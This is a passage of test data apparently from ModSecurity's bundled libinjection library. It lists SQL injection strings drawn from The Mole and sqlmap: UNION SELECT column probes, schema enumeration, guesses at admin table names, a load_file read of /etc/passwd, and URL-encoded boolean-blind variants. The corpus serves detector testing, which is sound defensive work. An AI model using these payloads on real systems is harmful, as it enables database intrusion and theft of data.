999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x 999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x 999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x 999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x 999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x 999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x 999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x 999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x 999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x 999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x 999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x 999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x 999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x 999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x 999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x 999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x 999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x 999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x 999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x 999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x 999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x 999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x 999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x 999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x 999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x 999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x 999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x 999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x modsecurity-v3.0.4/others/libinjection/data/sqli-themole.txt0000644000175000017500000001567313607066311024556 0ustar zimmerlezimmerle1' and '1' like '1 1' and '1' like '0 1' and 0 < (select length(@@version)) and '1' like '1 1' own3d by 1 1' order by 1# 1' order by 15000# 1' order by 2 # 1' order by 4 # 1' order by 3 # 1' and 1=0 union all select 0x373134,0x373135# 1' and 1 = 0 UNION ALL SELECT 0,CONCAT(@@version,0x5468655f4d6f6c652e46316e67657221)# 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.schemata where 1=1# 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 0 # 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 2 # 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 4 # 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 6 # 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 1 # 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 3 # 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 5 # 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x6a756e6b# 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x6a756e6b limit 1 offset 0 # 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.columns where table_schema = 0x6a756e6b and table_name = 0x6a756e6b7573657273# 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(column_name, 0x20)),0x3a3a2d3a3a) from information_schema.columns where table_schema = 0x6a756e6b and table_name = 0x6a756e6b7573657273 limit 1 offset 1 # 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(column_name, 0x20)),0x3a3a2d3a3a) from information_schema.columns where table_schema = 0x6a756e6b and table_name = 0x6a756e6b7573657273 limit 1 offset 0 # 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(user(), 0x20),IFNULL(version(), 0x20),IFNULL(database(), 0x20)),0x3a3a2d3a3a)# 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(load_file(0x2f6574632f70617373776f7264), 0x20)),0x3a3a2d3a3a)# 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(load_file(0x2f746d702f6a756e6b), 0x20)),0x3a3a2d3a3a)# 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.adm where 1=1# 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.admin where 1=1# 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.admin_users where 1=1# 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.admins where 1=1# 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.administrator where 1=1# 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.administrador where 1=1# 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.administradores where 1=1# 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.client where 1=1# 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.clients where 1=1# 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.jos_users where 1=1# 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.login where 1=1# 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.logins where 1=1# 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.user where 1=1# 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.user_admin where 1=1# 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.users where 1=1# 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usuario where 1=1# 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usuarios where 1=1# 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usuarios_admin where 1=1# 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usr where 1=1# 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usrs where 1=1# 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.wp_users where 1=1# 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d6173 and table_name like 0x2541424c4525# 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525# 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 4 # 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 5 # 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 2 # 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 0 # 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 3 # 1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 1 # modsecurity-v3.0.4/others/libinjection/data/sqli-sqlmap_examples.txt0000644000175000017500000000154713607066311026307 0ustar zimmerlezimmerle# # Attacks pulled out of the examples from SQLMAP # # https:#svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/space2mssqlhash.py 1%23%0AAND%23%0A9227=9227 # https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/space2morehash.py 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227 # https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/space2hash.py 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227 # https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/space2dash.py 1--PTTmJopxdWJ%0AAND--cWfcVRPV%0A9227=9227 # https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/modsecurityzeroversioned.py 1+/*!00000AND+2>1*/--' # https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/halfversionedmorekeywords.py value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa modsecurity-v3.0.4/others/libinjection/data/sqli-sqlmap.txt0000644000175000017500004047610613607066311024424 0ustar zimmerlezimmerle## 1%22%27%27%22%29%22%22%28%28%22 1%29%20AND%201433%3D5210 1%29%20AND%207514%3D7514 1%29%20AND%208706%3D3435 1%27%29%20AND%206707%3D7880 1%27%29%20AND%207514%3D7514 1%27%29%20AND%203737%3D2182 1%27%20AND%201045%3D6029 1%27%20AND%207514%3D7514 1%27%20AND%208862%3D3790 1%22%20AND%203406%3D9309 1%22%20AND%207514%3D7514 1%22%20AND%205984%3D5341 1%29%20AND%201158%3D4103%20AND%20%289705%3D9705 1%29%20AND%207514%3D7514%20AND%20%289993%3D9993 1%29%20AND%201774%3D5815%20AND%20%284242%3D4242 1%29%29%20AND%207698%3D1352%20AND%20%28%283331%3D3331 1%29%29%20AND%207514%3D7514%20AND%20%28%281492%3D1492 1%29%29%20AND%206873%3D2746%20AND%20%28%283414%3D3414 1%29%29%29%20AND%203552%3D3016%20AND%20%28%28%289942%3D9942 1%29%29%29%20AND%207514%3D7514%20AND%20%28%28%283668%3D3668 1%29%29%29%20AND%207351%3D5629%20AND%20%28%28%283871%3D3871 1%20AND%201184%3D9752 1%20AND%207514%3D7514 1%20AND%206045%3D4988 1%27%29%20AND%204358%3D1995%20AND%20%28%27doJA%27%3D%27doJA 1%27%29%20AND%207514%3D7514%20AND%20%28%27BkKy%27%3D%27BkKy 1%27%29%20AND%208518%3D9322%20AND%20%28%27EeXA%27%3D%27EeXA 1%27%29%29%20AND%205225%3D1189%20AND%20%28%28%27GroJ%27%3D%27GroJ 1%27%29%29%20AND%207514%3D7514%20AND%20%28%28%27Ajth%27%3D%27Ajth 1%27%29%29%20AND%208269%3D5699%20AND%20%28%28%27hVHH%27%3D%27hVHH 1%27%29%29%29%20AND%208184%3D4008%20AND%20%28%28%28%27nuVK%27%3D%27nuVK 1%27%29%29%29%20AND%207514%3D7514%20AND%20%28%28%28%27LfVz%27%3D%27LfVz 1%27%29%29%29%20AND%207291%3D4211%20AND%20%28%28%28%27hbUR%27%3D%27hbUR 1%27%20AND%209926%3D7658%20AND%20%27ezef%27%3D%27ezef 1%27%20AND%207514%3D7514%20AND%20%27NCRE%27%3D%27NCRE 1%27%20AND%207193%3D7298%20AND%20%27wDEZ%27%3D%27wDEZ 1%27%29%20AND%202833%3D4204%20AND%20%28%27jvCx%27%20LIKE%20%27jvCx 1%27%29%20AND%207514%3D7514%20AND%20%28%27Uqnq%27%20LIKE%20%27Uqnq 1%27%29%20AND%205476%3D4207%20AND%20%28%27GieU%27%20LIKE%20%27GieU 1%27%29%29%20AND%204723%3D2436%20AND%20%28%28%27YroX%27%20LIKE%20%27YroX 1%27%29%29%20AND%207514%3D7514%20AND%20%28%28%27RCYg%27%20LIKE%20%27RCYg 1%27%29%29%20AND%201230%3D6832%20AND%20%28%28%27YoEO%27%20LIKE%20%27YoEO 1%27%29%29%29%20AND%206563%3D6922%20AND%20%28%28%28%27CEte%27%20LIKE%20%27CEte 1%27%29%29%29%20AND%207514%3D7514%20AND%20%28%28%28%27bXVv%27%20LIKE%20%27bXVv 1%27%29%29%29%20AND%208484%3D4681%20AND%20%28%28%28%27MYSh%27%20LIKE%20%27MYSh 1%27%20AND%207795%3D2249%20AND%20%27Avqc%27%20LIKE%20%27Avqc 1%27%20AND%207514%3D7514%20AND%20%27DEWT%27%20LIKE%20%27DEWT 1%27%20AND%201951%3D5378%20AND%20%27ZupM%27%20LIKE%20%27ZupM 1%22%29%20AND%203224%3D1885%20AND%20%28%22TIVm%22%3D%22TIVm 1%22%29%20AND%207514%3D7514%20AND%20%28%22SelA%22%3D%22SelA 1%22%29%20AND%201489%3D1776%20AND%20%28%22BJyo%22%3D%22BJyo 1%22%29%29%20AND%201235%3D6166%20AND%20%28%28%22Ijsp%22%3D%22Ijsp 1%22%29%29%20AND%207514%3D7514%20AND%20%28%28%22gxeZ%22%3D%22gxeZ 1%22%29%29%20AND%205232%3D8527%20AND%20%28%28%22Ssrz%22%3D%22Ssrz 1%22%29%29%29%20AND%203883%3D6222%20AND%20%28%28%28%22Adip%22%3D%22Adip 1%22%29%29%29%20AND%207514%3D7514%20AND%20%28%28%28%22SQtn%22%3D%22SQtn 1%22%29%29%29%20AND%209422%3D7097%20AND%20%28%28%28%22UImY%22%3D%22UImY 1%22%20AND%205832%3D4836%20AND%20%22jyRV%22%3D%22jyRV 1%22%20AND%207514%3D7514%20AND%20%22WvHR%22%3D%22WvHR 1%22%20AND%203841%3D4034%20AND%20%22bVvL%22%3D%22bVvL 1%22%29%20AND%207662%3D2969%20AND%20%28%22AIFS%22%20LIKE%20%22AIFS 1%22%29%20AND%207514%3D7514%20AND%20%28%22UEky%22%20LIKE%20%22UEky 1%22%29%20AND%202522%3D3511%20AND%20%28%22AETl%22%20LIKE%20%22AETl 1%22%29%29%20AND%201226%3D3354%20AND%20%28%28%22sJmD%22%20LIKE%20%22sJmD 1%22%29%29%20AND%207514%3D7514%20AND%20%28%28%22ObQi%22%20LIKE%20%22ObQi 1%22%29%29%20AND%206002%3D2226%20AND%20%28%28%22Mtgz%22%20LIKE%20%22Mtgz 1%22%29%29%29%20AND%203213%3D9873%20AND%20%28%28%28%22veBQ%22%20LIKE%20%22veBQ 1%22%29%29%29%20AND%207514%3D7514%20AND%20%28%28%28%22RDIT%22%20LIKE%20%22RDIT 1%22%29%29%29%20AND%204247%3D2375%20AND%20%28%28%28%22ziCd%22%20LIKE%20%22ziCd 1%22%20AND%206229%3D3441%20AND%20%22Eipk%22%20LIKE%20%22Eipk 1%22%20AND%207514%3D7514%20AND%20%22lCjg%22%20LIKE%20%22lCjg 1%22%20AND%203137%3D5363%20AND%20%22MslS%22%20LIKE%20%22MslS 1%29%20WHERE%202847%3D2847%20AND%205431%3D1468 1%29%20WHERE%201007%3D1007%20AND%207514%3D7514 1%29%20WHERE%203185%3D3185%20AND%208299%3D5606 1%27%29%20WHERE%203241%3D3241%20AND%202351%3D2807 1%27%29%20WHERE%206080%3D6080%20AND%207514%3D7514 1%27%29%20WHERE%203548%3D3548%20AND%209844%3D5673 1%27%20WHERE%207684%3D7684%20AND%207224%3D5528 1%27%20WHERE%205692%3D5692%20AND%207514%3D7514 1%27%20WHERE%207469%3D7469%20AND%202083%3D7298 1%22%20WHERE%202605%3D2605%20AND%205559%3D9516 1%22%20WHERE%206946%3D6946%20AND%207514%3D7514 1%22%20WHERE%203964%3D3964%20AND%207908%3D3889 1%27%20%7C%7C%20%28SELECT%205508%20FROM%20DUAL%20WHERE%206200%3D6200%20AND%204747%3D5371%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201183%20FROM%20DUAL%20WHERE%207570%3D7570%20AND%207514%3D7514%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205760%20FROM%20DUAL%20WHERE%203959%3D3959%20AND%206875%3D5443%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209956%20WHERE%209717%3D9717%20AND%207348%3D3999%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202879%20WHERE%205211%3D5211%20AND%207514%3D7514%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203272%20WHERE%201797%3D1797%20AND%203171%3D5860%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%202254%20FROM%20DUAL%20WHERE%205828%3D5828%20AND%209998%3D1925%20%29 1%20%2B%20%28SELECT%208034%20FROM%20DUAL%20WHERE%207345%3D7345%20AND%207514%3D7514%20%29 1%20%2B%20%28SELECT%205662%20FROM%20DUAL%20WHERE%206609%3D6609%20AND%209992%3D8928%20%29 1%20%2B%20%28SELECT%208065%20WHERE%207429%3D7429%20AND%208168%3D5690%20%29 1%20%2B%20%28SELECT%208621%20WHERE%201154%3D1154%20AND%207514%3D7514%20%29 